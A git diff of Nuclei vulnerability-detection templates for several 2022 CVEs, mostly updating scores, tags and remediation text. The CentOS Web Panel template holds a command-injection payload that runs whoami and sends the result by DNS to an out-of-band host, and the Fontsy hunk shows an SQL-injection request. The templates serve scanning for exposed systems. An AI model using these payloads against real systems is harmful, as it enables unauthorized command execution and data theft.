490a00463044022050f4dc233a6c8c50bcadbcf396489d5989f5cf62ffd6cb402dbc43cfe69e6f6402200b14ceb503bd1bf9031de7df04c8feda19c878b89191432d6fd0ba9f90583f82:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008c170d16acd8d4fcd8b061a57759895cb1c1f4d2d844154a2bc28d348695383502210082727ca9d4adcdf1004042ef259119a55de484872ede8cad1aaf0ded1f7c2d8d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-44290.yaml b/nuclei-templates/CVE-2022/CVE-2022-44290.yaml index aaab774bf7..6a3a117619 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-44290.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-44290.yaml @@ -16,15 +16,15 @@ info: cvss-score: 9.8 cve-id: CVE-2022-44290 cwe-id: CWE-89 - epss-score: 0.00789 - epss-percentile: 0.79529 + epss-score: 0.01336 + epss-percentile: 0.8578 cpe: cpe:2.3:a:webtareas_project:webtareas:2.4:p5:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: webtareas_project product: webtareas - tags: cve,cve2022,sqli,webtareas,authenticated,intrusive + tags: cve,cve2022,sqli,webtareas,authenticated,intrusive,webtareas_project http: - raw: @@ -63,4 +63,4 @@ http: - contains(header, "text/html") - contains(body, 'Delete the following?') condition: and -# digest: 4b0a004830460221009a936b29b84c66953591a5aeff19006ed42e51409605e98b631fcb710ea77c6502210086295628272840aadfda1955e25e6e1e28cdbc5e72872b5a9c0b01bf5533acd0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ec9c9149107256ee388b4fad74e2dd7cb17cd09813c8e78bfee6e1f3fa76f85402206e12fab64eaca7a7280bd62ee2af0e78d716ae1ae94ef685835435bf889b63b8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-44291.yaml b/nuclei-templates/CVE-2022/CVE-2022-44291.yaml index b40da98167..945f09a011 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-44291.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-44291.yaml @@ -16,15 +16,15 @@ info: cvss-score: 9.8 cve-id: CVE-2022-44291 cwe-id: CWE-89 - epss-score: 0.00789 - epss-percentile: 0.79529 + epss-score: 0.01336 + epss-percentile: 0.8578 cpe: cpe:2.3:a:webtareas_project:webtareas:2.4:p5:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: webtareas_project product: webtareas - tags: cve,cve2022,sqli,webtareas,authenticated,intrusive + tags: cve,cve2022,sqli,webtareas,authenticated,intrusive,webtareas_project http: - raw: @@ -64,4 +64,4 @@ http: - 'contains(header_2, "text/html")' - 'contains(body_1, "webTareasSID")' condition: and -# digest: 4a0a00473045022100d31144d74bde72fdc9a29212e98676d5fa0a21df115a3fff46e2c4f940faffc3022062e641f9840b58e0d7e5a0a382b7c3253402a57f8b5a5b63e7e8120e8d04545c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f9fa6e7b1841bcd70d3d68bb92ef27362bce875c298bee65f81acae33f5c999902201fc68f4f443a20fecb39c3509c24b3634548412e25006cef58d5867b3cbfc6e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-4447.yaml b/nuclei-templates/CVE-2022/CVE-2022-4447.yaml index ee37e0fedf..f56af58d56 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-4447.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-4447.yaml @@ -1,11 +1,15 @@ id: CVE-2022-4447 info: - name: Fontsy <= 1.8.6 - Unauthenticated SQLi + name: WordPress Fontsy <=1.8.6 - SQL Injection author: theamanrawat severity: critical description: | - The plugin does not properly sanitize and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection. + WordPress Fontsy plugin through 1.8.6 is susceptible to SQL injection. The plugin does not properly sanitize and escape a parameter before using it in a SQL statement via an AJAX action. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or further compromise of the WordPress site. + remediation: | + Update the Fontsy plugin to the latest version (>=1.8.7) or apply the vendor-provided patch to mitigate the SQL Injection vulnerability. reference: - https://wpscan.com/vulnerability/6939c405-ac62-4144-bd86-944d7b89d0ad - https://wordpress.org/plugins/fontsy/ @@ -15,14 +19,20 @@ info: cvss-score: 9.8 cve-id: CVE-2022-4447 cwe-id: CWE-89 + epss-score: 0.03134 + epss-percentile: 0.9009 + cpe: cpe:2.3:a:fontsy_project:fontsy:*:*:*:*:*:wordpress:*:* metadata: - verified: "true" - tags: cve,wordpress,wp,wpscan,cve2022,wp-plugin,sqli,fontsy,unauth - + verified: true + max-request: 1 + vendor: fontsy_project + product: fontsy + framework: wordpress + tags: cve,cve2022,wordpress,wp,wpscan,wp-plugin,sqli,fontsy,unauth,fontsy_project variables: num: "999999999" -requests: +http: - raw: - | POST /wp-admin/admin-ajax.php?action=get_tag_fonts HTTP/1.1 @@ -38,3 +48,4 @@ requests: - 'contains(content_type, "text/html")' - 'contains(body, "{{md5(num)}}")' condition: and +# digest: 4b0a00483046022100d97fe9d2af29c15dc73b8a19c1f69016ed9cf31e60a5767759fe6c56ba2601a2022100d80cb2be444aeac965e4c0abdc2f71d2d232416217054298f34b26cd50c7c429:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-44877.yaml b/nuclei-templates/CVE-2022/CVE-2022-44877.yaml index e9763a5af2..0348ce8bc0 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-44877.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-44877.yaml @@ -1,27 +1,38 @@ id: CVE-2022-44877 info: - name: Centos Web Panel - Unauthenticated Remote Code Execution + name: CentOS Web Panel 7 <0.9.8.1147 - Remote Code Execution author: For3stCo1d severity: critical description: | - RESERVED An issue in the /login/index.php component of Centos Web Panel 7 before v0.9.8.1147 allows unauthenticated attackers to execute arbitrary system commands via crafted HTTP requests. + CentOS Web Panel 7 before 0.9.8.1147 is susceptible to remote code execution via entering shell characters in the /login/index.php component. This can allow an attacker to execute arbitrary system commands via crafted HTTP requests and potentially execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. + remediation: | + Upgrade to CentOS Web Panel version 0.9.8.1147 or later to mitigate this vulnerability. reference: - https://twitter.com/_0xf4n9x_/status/1612068225046675457 - https://github.com/numanturle/CVE-2022-44877 - - https://nvd.nist.gov/vuln/detail/CVE-2022-44877 - https://gist.github.com/numanturle/c1e82c47f4cba24cff214e904c227386 + - https://nvd.nist.gov/vuln/detail/CVE-2022-44877 + - http://packetstormsecurity.com/files/171725/Control-Web-Panel-7-CWP7-0.9.8.1147-Remote-Code-Execution.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-44877 cwe-id: CWE-78 + epss-score: 0.97427 + epss-percentile: 0.99935 + cpe: cpe:2.3:a:control-webpanel:webpanel:*:*:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: control-webpanel + product: webpanel shodan-query: http.title:"Login | Control WebPanel" - verified: "true" - tags: cve,cve2022,centos,rce,kev + tags: cve,cve2022,packetstorm,centos,rce,kev,control-webpanel -requests: +http: - raw: - | POST /login/index.php?login=$(ping${IFS}-nc${IFS}2${IFS}`whoami`.{{interactsh-url}}) HTTP/1.1 @@ -33,7 +44,7 @@ requests: matchers-condition: and matchers: - type: word - part: interactsh_protocol # Confirms the HTTP Interaction + part: interactsh_protocol # Confirms the HTTP Interaction words: - "dns" @@ -48,7 +59,8 @@ requests: extractors: - type: regex - part: interactsh_request group: 1 regex: - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' + part: interactsh_request +# digest: 4a0a004730450220251a5e0fed581fcfeb62eda5c7320913dc45d41e9d3a17e40ff963b7ec6bf7bb022100a851f4d7f5205ec1dc955bdd0d285e0d7e380efde8ac49d3dec58ed7a677db6a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-44944.yaml b/nuclei-templates/CVE-2022/CVE-2022-44944.yaml index 3b84cdd14d..a969924eae 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-44944.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-44944.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Add Announcement function at /index.php?module=help_pages/pages&entities_id=24. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Title field. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected application. remediation: | Upgrade Rukovoditel to version 3.2.2 or later to mitigate the XSS vulnerability. reference: @@ -18,8 +20,8 @@ info: cvss-score: 5.4 cve-id: CVE-2022-44944 cwe-id: CWE-79 - epss-score: 0.00186 - epss-percentile: 0.5583 + epss-score: 0.00091 + epss-percentile: 0.37842 cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* metadata: verified: true @@ -27,7 +29,7 @@ info: vendor: rukovoditel product: rukovoditel shodan-query: http.favicon.hash:-1499940355 - tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated + tags: cve2022,cve,rukovoditel,stored-xss,xss,authenticated http: - raw: @@ -65,4 +67,4 @@ http: regex: - 'id="form_session_token" value="(.*)" type="hidden"' internal: true -# digest: 4a0a00473045022100bcfc64344173510396d8256fff3943ba4363370e25850f503147cfa48dbfb453022008cea9ca8b570f7bc2d7687644c6732fec5d7e56692fa72ef2a9b456229d1533:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202f7c5ec782c15c9e2283d7a395b38639394668e4926e5256f17bd15c01a48b550220733ea68014deaa76cd6eb149fa40f8dc6cc38bbc1686f370c683bca1e7b15c5e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-44946.yaml b/nuclei-templates/CVE-2022/CVE-2022-44946.yaml index f5af6b3447..c04b5a31c7 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-44946.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-44946.yaml @@ -18,8 +18,8 @@ info: cvss-score: 5.4 cve-id: CVE-2022-44946 cwe-id: CWE-79 - epss-score: 0.00186 - epss-percentile: 0.5583 + epss-score: 0.00091 + epss-percentile: 0.38539 cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* metadata: verified: true @@ -65,4 +65,4 @@ http: regex: - 'id="form_session_token" value="(.*)" type="hidden"' internal: true -# digest: 4b0a00483046022100dad5ead68521a5694c091776658b1f9465dd0832ee819d5b94cd23d1b707011b022100f5eddc1ab65709f6be4ff7e9b4be89401b05cf11307780ce8ba532232ee0be27:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022024f1b4397b5259096b3834d56e20ade3350323ef4131fb0cc5c225ad63dedfc3022022204d8791d85002284c41b635deb56440af75f6fbe8bc85afaac26ed3589e62:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-44947.yaml b/nuclei-templates/CVE-2022/CVE-2022-44947.yaml index 24df3408d7..c7a0067ab7 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-44947.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-44947.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Highlight Row feature at /index.php?module=entities/listing_types&entities_id=24. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Note field after clicking "Add". + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected application. remediation: | Upgrade Rukovoditel to a version higher than 3.2.1 to mitigate the XSS vulnerability. reference: @@ -18,8 +20,8 @@ info: cvss-score: 5.4 cve-id: CVE-2022-44947 cwe-id: CWE-79 - epss-score: 0.00221 - epss-percentile: 0.60147 + epss-score: 0.00109 + epss-percentile: 0.43483 cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* metadata: verified: true @@ -27,7 +29,7 @@ info: vendor: rukovoditel product: rukovoditel shodan-query: http.favicon.hash:-1499940355 - tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated + tags: cve2022,cve,rukovoditel,stored-xss,xss,authenticated http: - raw: @@ -65,4 +67,4 @@ http: regex: - 'id="form_session_token" value="(.*)" type="hidden"' internal: true -# digest: 4b0a00483046022100b015de38f6a576fcb1d6bf9e1ab44fac05236112e36cda92ee916fa41d574643022100f8134d3aaef4d68ee4dcffc890dd7efcd2f1c52db0ece4bf742e79601c16bead:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022078e8f384c073f04187e7ecaa23493ea0407fa54e1c570bdc4a4c07f2c0e0aeb7022100c361072086badba50693529add0141de6f5fd89d5d8575733ec9c8add9f81bdd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-44948.yaml b/nuclei-templates/CVE-2022/CVE-2022-44948.yaml index 4d0bf4ae08..0aed280f8d 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-44948.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-44948.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Entities Group feature at/index.php?module=entities/entities_groups. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name field after clicking "Add". + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected application. remediation: | Upgrade Rukovoditel to a version higher than 3.2.1 or apply the vendor-provided patch to mitigate the XSS vulnerability. reference: @@ -18,8 +20,8 @@ info: cvss-score: 5.4 cve-id: CVE-2022-44948 cwe-id: CWE-79 - epss-score: 0.00186 - epss-percentile: 0.5583 + epss-score: 0.00091 + epss-percentile: 0.38514 cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* metadata: verified: true @@ -64,4 +66,4 @@ http: regex: - 'id="form_session_token" value="(.*)" type="hidden"' internal: true -# digest: 4a0a00473045022074a80f2f365d11eff5662d311fac8aa8d0bca9d7c18c51c40fa7738952b9876a022100a9a40e0ff113d9c361c1f9164cc563586f8f5680e9942cde1d8fc3a4bd357a99:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205b6515306a5ef9306b7d686e82462ce1df63dce1c25583df5601045b4cf4a31d022078af5b19991d9970bb152e4c5a8568dd4bfc3f29ea04e457305f13211933789f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-44949.yaml b/nuclei-templates/CVE-2022/CVE-2022-44949.yaml index fc8ab20bf1..0360fbb3cf 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-44949.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-44949.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Add New Field function at /index.php?module=entities/fields&entities_id=24. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Short Name field. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected application. remediation: | Upgrade Rukovoditel to version 3.2.2 or later to mitigate the XSS vulnerability. reference: @@ -18,8 +20,8 @@ info: cvss-score: 5.4 cve-id: CVE-2022-44949 cwe-id: CWE-79 - epss-score: 0.00186 - epss-percentile: 0.5583 + epss-score: 0.00091 + epss-percentile: 0.37842 cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* metadata: verified: true @@ -132,4 +134,4 @@ http: regex: - id="form_session_token" value="(.*)" type="hidden" internal: true -# digest: 490a00463044022050450e2f2e9db2a6781a697bf36ab6c5cdc5caf1071f182c6d3303303dfecaee02203a2229a5c228a22f3c2399e1c733237f8836dc32d11fa072822e79151b461a30:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022037ac8cfd48d6e676a3f4070803b999e42015a084c80c82903af299f909a3f4c0022100d3e3d7588abcfac6a671c786adbb650b7df45706ff32d77b8cd302a48ee9b9f4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-44950.yaml b/nuclei-templates/CVE-2022/CVE-2022-44950.yaml index aa1bc48c95..c6c75dba21 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-44950.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-44950.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Add New Field function at /index.php?module=entities/fields&entities_id=24. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name field. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected application. remediation: | Upgrade Rukovoditel to a version higher than 3.2.1 to mitigate the XSS vulnerability. reference: @@ -18,8 +20,8 @@ info: cvss-score: 5.4 cve-id: CVE-2022-44950 cwe-id: CWE-79 - epss-score: 0.00186 - epss-percentile: 0.5583 + epss-score: 0.00091 + epss-percentile: 0.37842 cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* metadata: verified: true @@ -132,4 +134,4 @@ http: regex: - id="form_session_token" value="(.*)" type="hidden" internal: true -# digest: 490a0046304402201b6551aa04e62ecc2bb75c9be14b2b521b1e67caf84360763cd77ffd2b2bc637022056f66d34f2999d5083e5de4a84f96c045d50005025a1b50bb5e2c4565ccee545:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022001a28e54084dcf3166039fad4b05645b273c717120b1d20a00477f3fef70fe2d022100b25e6ef84ecf7425a03c0eb0b95ee1e0c051e5d3e099755d74b83057bc955aae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-44951.yaml b/nuclei-templates/CVE-2022/CVE-2022-44951.yaml index 9086539b94..6e5a05dfbc 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-44951.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-44951.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Add New Form tab function at /index.php?module=entities/forms&entities_id=24. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name field. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected application. remediation: | Upgrade Rukovoditel to a version higher than 3.2.1 to mitigate the XSS vulnerability. reference: @@ -18,8 +20,8 @@ info: cvss-score: 5.4 cve-id: CVE-2022-44951 cwe-id: CWE-79 - epss-score: 0.00186 - epss-percentile: 0.5583 + epss-score: 0.00091 + epss-percentile: 0.37842 cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* metadata: verified: true @@ -63,4 +65,4 @@ http: regex: - 'id="form_session_token" value="(.*)" type="hidden"' internal: true -# digest: 4a0a00473045022100cf56ee975068f2decb23cf9e32884af533e0aa6e3d24fc09d2a1bc6f6384495f022070c8ceeebf2a9bc99e05d478478d274e0e55ead714458ae7fbe68cad62b18cd4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f6a6e75d3fcbeefb7bfe70fa11407ec0b7055b0830115dccaed3687cde983b03022100cb450ef92e316a1a23d3173d3838b7b51de7154dc44f3b963cda8866e4e95e59:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-44952.yaml b/nuclei-templates/CVE-2022/CVE-2022-44952.yaml index 13934010bf..1fbf828fb0 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-44952.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-44952.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in /index.php?module=configuration/application. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Copyright Text field after clicking "Add". + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected application. remediation: | Upgrade Rukovoditel to a version higher than 3.2.1 to mitigate the XSS vulnerability. reference: @@ -18,8 +20,8 @@ info: cvss-score: 5.4 cve-id: CVE-2022-44952 cwe-id: CWE-79 - epss-score: 0.13545 - epss-percentile: 0.95044 + epss-score: 0.07295 + epss-percentile: 0.93905 cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* metadata: verified: true @@ -145,4 +147,4 @@ http: regex: - id="form_session_token" value="(.*)" type="hidden" internal: true -# digest: 4a0a00473045022100e2f4d0fe89c851b46259b0c03f98f87d8bbe92273b617b5b335b5f7a73a5c2390220647d6169db99933cf4a2e52a12c81ae9e3287185d235f1fffa6903bb3832a38f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202de06b8a6e888b2993c09a60cfd35c2c48341bc45d7140638b7da6a9f927e15c02205443f1e3d88ae7dca53733dc34930bd1491cd200d6b944d53412de96d56c8bd6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-44957.yaml b/nuclei-templates/CVE-2022/CVE-2022-44957.yaml index be6084c53a..d6cae7559b 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-44957.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-44957.yaml @@ -16,15 +16,15 @@ info: cvss-score: 5.4 cve-id: CVE-2022-44957 cwe-id: CWE-79 - epss-score: 0.00186 - epss-percentile: 0.5583 + epss-score: 0.00091 + epss-percentile: 0.37842 cpe: cpe:2.3:a:webtareas_project:webtareas:2.4:p5:*:*:*:*:*:* metadata: verified: true max-request: 3 vendor: webtareas_project product: webtareas - tags: cve,cve2022,xss,webtareas,authenticated,intrusive + tags: cve,cve2022,xss,webtareas,authenticated,intrusive,webtareas_project http: - raw: @@ -168,4 +168,4 @@ http: regex: - 'name="csrfToken" value="([0-9a-zA-Z]+)"' internal: true -# digest: 4a0a00473045022100af9a35237502f9454e9d2aa9f21b65787f52496aa6f0a7012cae4bb86ad235ab022057d590e56ba2b75446c1142b9bbc63a596a54fc6447663b1753f17e8bbd32f08:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022058e04c959164a6887128bff5e2c81ff9a549a4941e0adc621d267e956d6d1fe1022100d36b02df2b82b6dd9d1065d82767ab1ec79b2649450f25d69ecffca80b581608:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-45037.yaml b/nuclei-templates/CVE-2022/CVE-2022-45037.yaml index 5c1f4c144a..b6bf794878 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-45037.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-45037.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | A cross-site scripting (XSS) vulnerability in /admin/users/index.php of WBCE CMS v1.5.4 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Display Name field. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Upgrade to the latest version of WBCE CMS or apply the necessary patches provided by the vendor to fix the Cross Site Scripting vulnerability. reference: @@ -17,8 +19,8 @@ info: cvss-score: 5.4 cve-id: CVE-2022-45037 cwe-id: CWE-79 - epss-score: 0.00086 - epss-percentile: 0.3585 + epss-score: 0.00092 + epss-percentile: 0.37956 cpe: cpe:2.3:a:wbce:wbce_cms:1.5.4:*:*:*:*:*:*:* metadata: verified: true @@ -101,4 +103,4 @@ http: - 'name="username_fieldname" value="(.*)"' internal: true part: body -# digest: 4b0a00483046022100c91585882c3d26fbb93f4e94ce4f6dff0166c89728f922238cc537ba2f7f5c0d022100d150a1d012549bfe1e443a39abfddc276e01682de3efb2d83ca784ff5b74442f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200bbd80622f1f04490521053deeca5606b0a210f7653053a685aaa4abce0fca8402204d4cd83e2003265d8894d8f57d458ccb79a94b581644b8968eb1b268fbb063b2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-45038.yaml b/nuclei-templates/CVE-2022/CVE-2022-45038.yaml index bb06d84e01..3d239db9e3 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-45038.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-45038.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | A cross-site scripting (XSS) vulnerability in /admin/settings/save.php of WBCE CMS v1.5.4 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Website Footer field. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Upgrade to a patched version of WBCE CMS or apply the necessary security patches provided by the vendor. reference: @@ -17,15 +19,15 @@ info: cvss-score: 5.4 cve-id: CVE-2022-45038 cwe-id: CWE-79 - epss-score: 0.00086 - epss-percentile: 0.3585 + epss-score: 0.00092 + epss-percentile: 0.37956 cpe: cpe:2.3:a:wbce:wbce_cms:1.5.4:*:*:*:*:*:*:* metadata: verified: true max-request: 5 vendor: wbce product: wbce_cms - tags: cve,cve2022,xss,wbce,cms,authenticated + tags: cve2022,cve,xss,wbce,cms,authenticated http: - raw: @@ -101,4 +103,4 @@ http: - 'name="app_name" value="(.*?)"' internal: true part: body -# digest: 4a0a00473045022100b3d37ba6cd061547b44cb8ce77b6bfe356e4740b8447c372dc5c900a230b385c0220138d665fe4c0aa98752f8d9a48c15f4e424fd209fa916b9061777551fa866c46:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220236c2ea7a5a87ab71674dcbc6b934a4397029b3d326ba6f7e3a9a51beacb9a94022066f22477022e34bd8d4bd31f88af1c31eae3632e616489ed4c7763b4ea2aaa8d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-45354.yaml b/nuclei-templates/CVE-2022/CVE-2022-45354.yaml index b019bb348e..1a67257e6a 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-45354.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-45354.yaml @@ -3,19 +3,33 @@ id: CVE-2022-45354 info: name: Download Monitor <= 4.7.60 - Sensitive Information Exposure author: DhiyaneshDK - severity: medium + severity: high description: | The Download Monitor plugin for WordPress is vulnerable to Sensitive Information Exposure in versions up to, and including, 4.7.60 via REST API. This can allow unauthenticated attackers to extract sensitive data including user reports, download reports, and user data including email, role, id and other info (not passwords) + impact: | + An attacker can exploit this vulnerability to gain access to sensitive information, potentially leading to further attacks or unauthorized access. remediation: | Update to the latest version of the Download Monitor plugin (4.7.60) or apply the provided patch to fix the vulnerability. reference: - https://github.com/RandomRobbieBF/CVE-2022-45354 - https://wordpress.org/plugins/download-monitor/ + - https://patchstack.com/database/vulnerability/download-monitor/wordpress-download-monitor-plugin-4-7-60-sensitive-data-exposure-vulnerability?_s_id=cve + - https://github.com/nomi-sec/PoC-in-GitHub + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2022-45354 + epss-score: 0.00408 + epss-percentile: 0.73349 + cpe: cpe:2.3:a:wpchill:download_monitor:*:*:*:*:*:wordpress:*:* metadata: verified: true max-request: 1 + vendor: wpchill + product: download_monitor + framework: wordpress shodan-query: html:"/wp-content/plugins/download-monitor/" - tags: cve,cve2023,wordpress,wp-plugin,download-monitor,wp + tags: cve,cve2022,wordpress,wp-plugin,download-monitor,wp http: - method: GET @@ -39,5 +53,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402202b5c87ca1023260f4efdf189c9853d10e43d226515063195b6b48f7f72d486f1022063ca220113fa902ef786d71ab90b4fb066f810430711acbad5b73287cff1da6e:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402206621ba65377b37becb2284647d51d4fe5423206a1ad56f63d7415c1fc1df85b602205154d8ffe0a0ab0837dcfabe75991d8434b2c1787f71eedbb5faad326966cc53:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-45362.yaml b/nuclei-templates/CVE-2022/CVE-2022-45362.yaml index f35ee0a085..f2b0a0fa05 